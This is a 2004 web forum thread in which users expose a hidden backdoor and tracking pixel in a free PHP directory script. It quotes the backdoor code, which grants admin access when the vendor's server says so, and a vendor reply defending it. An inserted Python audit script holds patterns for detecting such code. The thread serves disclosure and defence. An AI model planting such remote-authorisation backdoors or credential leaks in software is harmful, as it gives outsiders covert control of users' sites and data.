Webmaster Forum

Backdoor in 'Free PHP Directory Script' ?

#1, 09-05-2004, 07:49 AM, posted by Brian911 (Member)

I read some reviews about Biz Directory's Free PHP Directory Script and some said that there was a backdoor that allowed the programmer to enter your admin area and delete everything in your database.

I had a quick look at the scripts but couldn't find anything besides an ordinary, invisible gif.

I wouldn't want to risk my directory because of this... free script or not.
Do you run this script?

#2, 09-05-2004, 08:17 AM, posted by awall19 (Senior Member)
I run the script. I save my databases frequently. If somebody did that then you can bet he would not be selling too many more scripts.

#3, 09-05-2004, 08:32 AM, posted by MarketingLady (Junior Member)
There are 2 dirty tricks inside the original free script:

1. File: include.php >> line 60, scroll to the right >> there is a query sending your password to biz-d.
2. File: install4.php >> line 62: <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> >> with this hidden Gif he gets the referrer

Greets

#4, 09-05-2004, 09:28 AM, posted by awall19 (Senior Member)
Quote:
Originally Posted by MarketingLady
There are 2 dirty tricks inside the original free script:

1. File: include.php >> line 60, scroll to the right >> there is a query sending your password to biz-d.
2. File: install4.php >> line 62: <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> >> with this hidden Gif he gets the referrer

Greets
how do you remove the part in #1 while still leaving the script operable?

if you remove that code of line from #2 does that link go away?

#5, 09-05-2004, 09:40 AM, posted by Jazzee
These are only in the free version?

#6, 09-05-2004, 09:54 AM, posted by awall19 (Senior Member)
Quote:
Originally Posted by Jazzee
These are only in the free version?
well if you do the $50 version you only take out the links back to his site...which is kinda screwed up if he leaves an easter egg link in there anyway.

not sure about the $700 version. if he does it with that then he is really messed up

#7, 09-05-2004, 12:34 PM (v7n Mentor)
Quote:
Originally Posted by awall19
Quote:
Originally Posted by Jazzee
These are only in the free version?
well if you do the $50 version you only take out the links back to his site...which is kinda screwed up if he leaves an easter egg link in there anyway.

not sure about the $700 version. if he does it with that then he is really messed up
The full version does not have it. I went through the whole script early today but it has been modified a lot since installation; so I’m not exactly sure if it originally contained it.
I would be one aggravated person if it did. I paid what I considered big bucks for a script that had very poor cross-browser compatibility and have spent over $1,000 to make it so, and it's still not right.

#8, 09-05-2004, 01:57 PM, posted by MarketingLady (Junior Member)
Hi awall19

Here is a little "backdoor-fix" for #1

if ($pass) {
    $rand = md5(time());
    // Asks the vendor's server, with a time-based token, whether to let this request in
    $access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
    $access = fread($access,4);
    // If the remote host answers "true", an admin session is created with no local password check
    if ($access == "true") {
        session_start();
        $HTTP_SESSION_VARS['admin'] = true;
        header("Location: {$dir}admin_edit.php");
    };
};

For my part, I don't like people programming backdoors into freely available scripts. It isn't honest at all!
I don't know if the $700 script has the backdoor too; if someone sends me the code, I need 2 days to check it out with some capable university specialists and post you all the results or, if necessary, fixes.

Greets from Germany

#9, 09-05-2004, 02:06 PM, posted by MarketingLady (Junior Member)
Sorry, awall19, I didn't answer your second question; to keep it simple, just replace the image inside <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> by your own image, e.g. <IMG SRC="http://www.mydomain.com/imges/any_image.gif" WIDTH=1 HEIGHT=1>, the image I mean being located on your own server. This way, bad boys can't get the referrer any more :-)

Greets
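As an added example (not code from this thread or from the Biz Directory script), a small Python audit that looks for the two patterns MarketingLady describes in posts #3, #8 and #9: a fetch from a remote host that gates an admin session grant, and a 1x1 image loaded from a host other than your own. The sample file contents are constructed from the snippets quoted above, and the own-host allow-list is an assumption.

```python
import re

# Constructed sample files modelled on the snippets quoted in this thread;
# they are not the real Biz Directory sources.
SAMPLE_FILES = {
    "include.php": '''<?php
if ($pass) {
    $rand = md5(time());
    $access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
    $access = fread($access,4);
    if ($access == "true") {
        session_start();
        $HTTP_SESSION_VARS['admin'] = true;
        header("Location: {$dir}admin_edit.php");
    };
};
''',
    "install4.php": '<IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1>',
    # The replacement suggested in post #9: same tag, image served from the site's own host
    "install4_fixed.php": '<IMG SRC="http://www.mydomain.com/imges/any_image.gif" WIDTH=1 HEIGHT=1>',
    # A local file read plus a session grant is ordinary code and must not be flagged
    "clean.php": '<?php $cfg = file_get_contents("config.txt"); $_SESSION["admin"] = true;',
}

# Functions that fetch a remote URL when handed an http(s) string literal
REMOTE_OPEN = re.compile(
    r'\b(fopen|file_get_contents|fsockopen|curl_init)\s*\(\s*["\']https?://([^/"\']+)', re.I)
# Assignment that turns the current session into an admin session
ADMIN_GRANT = re.compile(
    r'(\$_SESSION|\$HTTP_SESSION_VARS)\s*\[\s*["\']admin["\']\s*\]\s*=\s*true', re.I)
# <img> whose src points at another host, and the 1x1 size that marks a tracking pixel
EXT_IMG = re.compile(r'<img[^>]*\bsrc\s*=\s*["\']https?://([^/"\']+)[^>]*>', re.I)
ONE_PX = re.compile(r'\bwidth\s*=\s*["\']?1\b[^>]*\bheight\s*=\s*["\']?1\b', re.I)

def audit(files, own_hosts=("www.mydomain.com",)):
    """Return (file, finding, hosts) tuples. own_hosts is an assumed allow-list."""
    findings = []
    for name, src in files.items():
        # Coarse file-level heuristic: a remote fetch and an admin grant in the
        # same file is the shape of the include.php block and deserves a look.
        hosts = sorted({m.group(2).lower() for m in REMOTE_OPEN.finditer(src)})
        if hosts and ADMIN_GRANT.search(src):
            findings.append((name, "remote-auth", hosts))
        for m in EXT_IMG.finditer(src):
            host = m.group(1).lower()
            if host not in own_hosts and ONE_PX.search(m.group(0)):
                findings.append((name, "tracking-pixel", [host]))
    return findings
```

Run `audit(SAMPLE_FILES)` to see both planted patterns reported while the fixed pixel and the clean file pass; point it at your own unpacked script tree by reading each .php file into the dict.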

#10, 09-05-2004, 02:27 PM, posted by awall19 (Senior Member)
Quote:
Originally Posted by MarketingLady
Hi awall19

Here is a little "backdoor-fix" for #1

if ($pass) {
    $rand = md5(time());
    $access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
    $access = fread($access,4);
    if ($access == "true") {
        session_start();
        $HTTP_SESSION_VARS['admin'] = true;
        header("Location: {$dir}admin_edit.php");
    };
};

Greets from Germany
I pulled this part ttp://www.directory-search.org/include_variables.php? out of my script. does that work? what details was he sending? the phpMyAdmin variables or just the general MySQL connect info

#11, 09-06-2004, 07:40 AM (Contributing Member)
I have sent the link of this thread to Javier García of Biz Directory. Awaiting his response.

#12, 09-06-2004, 08:53 AM, posted by samer (Contributing Member)
please inform us asap !

#13, 09-06-2004, 09:18 AM (Contributing Member)
He has sent a reply to me - reproduced below:

"The invisible image is just that, an image, unable to hurt in any way. It allows us to keep the records of installed scripts. It's more convenient than requesting the installation url every time the script is downloaded/installed.

The backdoor is password-protected, so it is impossible for anybody but us to access the script, not even people with access to the script code. We added this feature several months after the first distribution of the script. We had several problems with abusive users, not only removing copyright links but also reselling the script, besides other aggressive actions. So we decided to include this tool. We have only used it once, and its use was more than justified. As the full script is distributed after the purchase, and there is no risk, it does not include this feature.

I can assure you no legal user of the script has anything to be afraid of. In fact, if you or any other purchaser want a script copy without these things, I will have no problem sending it.

Regards

Javier García
Biz Directory"

So it turns out they have been stealing our passwords?

#14, 09-06-2004, 09:42 AM, posted by Jazzee
That is ridiculous. Shouldn't they have to tell you about that when you download the script?

#15, 09-06-2004, 10:38 AM, posted by JayM (Senior Member)
Unless that's written somewhere in their TOS and you agree to it, it is illegal for them to do this. That's just like distributing a trojan.

#16, 09-06-2004, 12:56 PM, posted by Brian911 (Member)
Quote:
Originally Posted by Jazzee
That is ridiculous. Shoudn't they have to tell you about that when you download the script?
well, would anybody download it if they advertised it as a backdoor script?

-

thanks for the research. after having a look at the programmer's email I decided to remove the backdoor (AND the uninstall script) and install the script first of all. I also installed another script that will have a look at the script directory and the mysql database... not sure if it will remain online yet.

#17, 09-06-2004, 12:58 PM, posted by Jazzee
Quote:
Originally Posted by Brian911
well, would anybody download it if they advertised it as a backdoor script?
No, but you'd think they'd have it in fine print somewhere.

#18, 09-06-2004, 01:01 PM, posted by John Scott (Individualist)
That is just on the free version. And, I can see Javier's point. If I offered a script for free, and they removed copyright notices/etc, I wouldn't be too happy.

#19, 09-06-2004, 01:02 PM, posted by Jazzee
That doesn't make it right.

#20, 09-06-2004, 01:08 PM, posted by John Scott (Individualist)
I fail to see how it could be wrong.